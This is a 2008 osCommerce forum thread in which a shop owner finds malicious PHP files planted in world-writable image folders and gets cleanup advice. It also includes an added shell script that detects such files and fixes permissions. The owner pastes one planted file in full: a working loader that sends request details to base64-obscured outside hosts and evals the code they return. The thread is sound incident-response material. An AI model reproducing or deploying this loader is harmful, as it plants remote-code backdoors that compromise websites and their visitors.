saduneni
Posted April 20, 2008

Please take a look at this link, it came from nowhere: http://www.girlzwholesale.com/catalog/imag...eb256204e2.html

The directory /sierra doesn't even exist! I need help. This is a new setup and I have limited help from my host (www.websitesource.com); they suggested I open a ticket in osCommerce. I thought there are "master minds" over here, so I am trying. Thanks in advance.
germ
Posted April 20, 2008

You've been hacked because the permissions on your /catalog/images folder are at 777.

Look at these files:

/catalog/images/71512.php
/catalog/images/banners/52488.php
/catalog/images/default/142853.php
/catalog/images/dvd/76321.php
/catalog/images/gt_interactive/137999.php
/catalog/images/hewlett_packard/141102.php
/catalog/images/icons/16755.php
/catalog/images/infobox/175095.php
/catalog/images/mail/211443.php
/catalog/images/matrox/130494.php
/catalog/images/microsoft/205609.php

I think you'll find them all bogus. This one looks very suspicious to me: /catalog/images/fsys2.php

--
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
saduneni (Author)
Posted April 20, 2008

I have checked the code and I did not find anything important; it all looks fishy, and the code on all the pages (as mentioned by germ) is similar to the one in fsys2.php, as below. Is this code something that belongs to osCommerce? And if yes, why is it in the image folder?

```php
<?
error_reporting(0);
$s="e";
// Collect details of the current request from $_SERVER (falling back to the
// old register_globals names where $_SERVER is not set).
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// Pack all of it, base64-encoded, into one dot-separated query string.
$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
// Fetch code from a remote host (the URL is hidden behind base64_decode) and
// execute it: first via include(), then file_get_contents()+eval(), then curl+eval().
if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}
else if (include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str));
else if ($c=file_get_contents(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);};
?>
```
germ
Posted April 20, 2008

Trust me, all those files are BAD. I know because the same thing happened to me last month. :blush:

There may be BAD files in your admin now, too. I can't see those.
germ
Posted April 20, 2008

The first thing you must do is change the permissions on the /catalog/images folder to 755. The same with all the folders inside the /catalog/images folder.

Then delete the bad files.

Then change the permissions on all the files in the /catalog/images folder to 644.

Then check your /admin/backups folder for bad files. And probably /admin/images folder.

You've been hacked for over a month. The timestamp on most of the bad files is: 10-Mar-2008 16:39
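As an added example, not code from the thread or from osCommerce: a small POSIX shell triage script that covers both the loader quoted in the earlier post and the remediation steps in this one. It lists PHP files under images/ (where none belong), directories left world-writable, and PHP files that pair base64_decode() with eval/include, then applies the 755/644 fix. It assumes the catalog path is passed as the first argument; make_sample_tree builds a constructed stand-in tree (two inert planted files named after entries in the thread, one real image, images/ at 777) so the functions can be exercised offline.

```shell
#!/bin/sh
# Added triage helper, not from the thread or from osCommerce.
# Usage: sh triage.sh /path/to/catalog

# 1. Image directories should hold images, never PHP: list every .php file
#    under DIR/images (on a clean shop this prints nothing).
find_php_in_images() {
    find "$1/images" -type f -name '*.php' 2>/dev/null | sort
}

# 2. Directories writable by "other" (the 777 case): any process on the
#    host, not just the web server, can drop files there.
find_world_writable_dirs() {
    find "$1" -type d -perm -002 2>/dev/null | sort
}

# 3. PHP files that pair base64_decode() with eval/include/require, the shape
#    of the fsys2.php loader. Legitimate osCommerce code rarely does this, so
#    every hit deserves a look.
find_suspicious_php() {
    find "$1" -type f -name '*.php' -exec grep -lE 'base64_decode *\(' {} + 2>/dev/null |
        while IFS= read -r f; do
            grep -qE '(^|[^A-Za-z0-9_])(eval|include|include_once|require|require_once) *\(' "$f" &&
                printf '%s\n' "$f"
        done | sort
}

# 4. The remediation from the thread: 755 on every directory, 644 on every
#    file, so only the owner can write.
fix_permissions() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# Print a report for one catalog, with ls -l so the timestamps (germ points at
# 10-Mar-2008 for the bogus files) are visible next to each hit.
report() {
    printf '== PHP files under images/ ==\n'
    find_php_in_images "$1" | while IFS= read -r f; do ls -l "$f"; done
    printf '== world-writable directories ==\n'
    find_world_writable_dirs "$1"
    printf '== PHP pairing base64_decode with eval/include ==\n'
    find_suspicious_php "$1"
}

# Constructed sample tree (not a real shop), so the functions can be run
# offline: two inert planted files named after entries from the thread, one
# real image, one legitimate include, and images/ plus a subfolder at 777.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/catalog/images/dvd" "$root/catalog/includes"
    chmod 755 "$root/catalog" "$root/catalog/includes"
    printf '<? eval(base64_decode("")); ?>\n' > "$root/catalog/images/71512.php"
    printf '<? include(base64_decode("aHR0cDovLw==")."/?x"); ?>\n' > "$root/catalog/images/dvd/76321.php"
    printf 'GIF89a' > "$root/catalog/images/dvd/cover.gif"
    printf '<?php define("STORE_NAME", "demo"); ?>\n' > "$root/catalog/includes/configure.php"
    chmod 777 "$root/catalog/images" "$root/catalog/images/dvd"
    printf '%s\n' "$root"
}

if [ -n "${1:-}" ]; then
    report "$1"
fi
```

Run the report first and keep its output; it is the list of what you delete and the evidence of when the files arrived. Only then run fix_permissions, since a directory that is still 777 will simply be refilled.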
saduneni (Author)
Posted April 20, 2008

Hi Jim, I keep on checking all the files in admin and other areas; so far I did not find any file. But what I did is I have removed fsys2.php (deleted); it looks like none of the catalog part is affected. I am going to back up and remove all the unwanted files, but my question is: can I change the permission on this folder? Please check the screenshot; I think it's 666 (hope I am right). Please, I need advice.
saduneni (Author)
Posted April 20, 2008

Sorry, overlooked. I am going to try and see. Thanks.
germ
Posted April 20, 2008

The permissions need to be 755.

Check all the boxes for USER.

Then for GROUP and OTHER, the READ and EXEC boxes ONLY!
saduneni (Author)
Posted April 20, 2008

:thumbsup: Thanks, I have done everything as per your instructions; my shop is in good shape. I have checked all the files in admin but I did not find any goofy files. Am I missing something, like hidden files I cannot see? And what about the database? Could there be any potential risk involved? Thanks again.
germ
Posted April 20, 2008

There weren't any hidden files in mine.

If you got all the bad files, changed the permissions like I said, and checked the admin, then you should be OK now.

Just keep a close eye on it for a while.
saduneni (Author)
Posted April 20, 2008

Sure, thanks Jim, thanks for your help.
This topic is now archived and is closed to further replies.